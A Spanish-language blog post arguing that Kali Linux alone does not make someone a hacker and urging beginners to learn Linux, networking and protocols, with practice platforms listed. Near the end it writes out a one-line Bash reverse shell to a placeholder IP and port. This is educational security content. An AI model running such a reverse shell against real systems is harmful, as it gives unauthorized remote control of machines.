En esta entrada comparto mi opinión (algo controversial, quizá), sobre una de las distribuciones GNU/Linux más conocidas en el mundo del hacking ético: Kali Linux.
Kali es una excelente herramienta, pero sólo si la usas con la intención de aprender a fondo. De lo contrario, es solo un disfraz técnico.
Mi primer contacto con Kali (y el error de muchos)
Mi camino empezó como el de muchos: descargué Kali Linux porque lo vi en YouTube, lo instalé en una máquina virtual, y empecé a probar herramientas sin tener idea de lo que estaba haciendo.
Me sentía “hacker” por tener una terminal negra y muchos menús con nombres intimidantes. Pero la verdad es que no entendía ni el 10% de lo que pasaba.
Con el tiempo me di cuenta de que:
- No aprendía nada real ejecutando comandos que no comprendía.
- Estaba más pendiente de “seguir tutoriales” que de entender conceptos.
- Me frustraba porque todo parecía complejo o se rompía al mínimo cambio.
El cambio: migrar a GNU/Linux como sistema principal
El punto de inflexión fue cuando decidí dejar de ver GNU/Linux como “el sistema para hackear” y comencé a usarlo como mi entorno diario.
Pasé por varias distros: Ubuntu, Debian, Arch… hasta entender cómo funciona el sistema desde abajo. Ya no usaba Linux solo para “pentesting”, sino para trabajar, estudiar y configurar mi entorno ideal.
Aprendí sobre:
- El sistema de archivos de Linux.
- Permisos, usuarios y grupos.
- Cómo funcionan los servicios (systemd, OpenRC…).
- La importancia de saber shell scripting, redes, procesos, logs, etc.
¿Por qué Kali Linux no te convierte en hacker?
Muchos creen que Kali Linux es la distro mágica para convertirse en hacker. Incluso yo lo llegué a creer. Viene con cientos de herramientas listas para usar, pero la realidad es otra: tener herramientas no es lo mismo que saber cómo funcionan o ser realmente bueno en ciberseguridad.
Kali Linux: ¿herramienta o juguete?
Kali Linux es un sistema operativo basado en Debian que incluye cientos de herramientas para pentesting, análisis forense y pruebas de seguridad. Eso está genial, pero:
- No es un botón mágico para hackear.
- Si no entiendes lo que haces, solo estás usando herramientas como un “script kiddie”.
- Muchas herramientas requieren conocimiento profundo para interpretar sus resultados.
Por ejemplo:
- Ejecutar Metasploit sin entender qué hace un payload es inútil.
- Capturar paquetes con Wireshark sin saber qué buscar es perder tiempo.
- Usar nmap sin entender los tipos de escaneo TCP/IP limita mucho tu capacidad.
Guía de tipos de escaneo con Nmap
Algunos errores de principiante (que también cometí)
- Pensar que ser hacker es lanzar exploits sin entenderlos.
- Creer que por usar Kali ya tenía “nivel”.
- Evitar aprender teoría porque “yo soy más práctico”.
- No entender los protocolos detrás de las herramientas.
- Depender demasiado de interfaces gráficas.
Aprendí que sin bases sólidas de redes, sistemas operativos y programación, cualquier intento de hacking es como disparar con los ojos cerrados.
La clave está en entender, no en automatizar
El verdadero hacking ético se basa en:
- Comprender cómo funcionan redes, sistemas y protocolos.
- Ser curioso y saber cómo romper cosas para aprender.
- Interpretar resultados y logs, no solo ejecutar comandos.
Un hacker de verdad:
- Crea sus propias herramientas (como reverse shells en Bash o Python).
- Analiza tráfico de red manualmente con tcpdump o Wireshark.
- Usa depuradores como gdb para entender el comportamiento de programas.
- Aprende cómo funcionan las vulnerabilidades a nivel técnico.
Alternativas para aprender hacking sin Kali Linux
No necesitás Kali para comenzar:
- Usa una instalación limpia de Debian y elegí qué herramientas instalar y por qué.
- Configura un entorno minimalista con tmux, zsh, vim o neovim para aprender a usar la CLI al 100%.
- Probá distros como Parrot OS si querés algo más pulido pero similar a Kali.
- Armá tu propio live USB con solo las herramientas que realmente vas a usar.
Ejemplo práctico: Reverse shell simple en Bash
Un clásico para entender cómo funcionan los shells remotos:
bash -i >& /dev/tcp/tu_ip/tu_puerto 0>&1
Esto abre una shell interactiva que conecta de vuelta a tu máquina, para que puedas controlar el sistema remoto desde tu consola.
Recursos para aprender de verdad
- OverTheWire: desafíos para aprender redes y sistemas desde cero.
- HackTheBox: laboratorios reales para practicar hacking ético.
- Exploit-DB: para estudiar exploits y vulnerabilidades.
- Plataformas como TryHackMe, PentesterLab y Cybrary.
Lo importante no es la distro, es tu mentalidad
Kali Linux puede ser una herramienta poderosa si sabés lo que hacés. Pero si sólo lo usás para sentirte “underground”, estás perdiendo el tiempo.
Lo que realmente marca la diferencia:
- La curiosidad por aprender desde lo más básico.
- La constancia para practicar y equivocarte.
- El deseo genuino de comprender el por qué de cada cosa.
Elige el camino difícil: aprender de verdad. Y Kali se convertirá en una aliada, no en una muleta.
No sos hacker por instalar Kali. Sos hacker cuando te tomás el tiempo de aprender cómo y por qué cada herramienta hace lo que hace.
El conocimiento no viene preinstalado.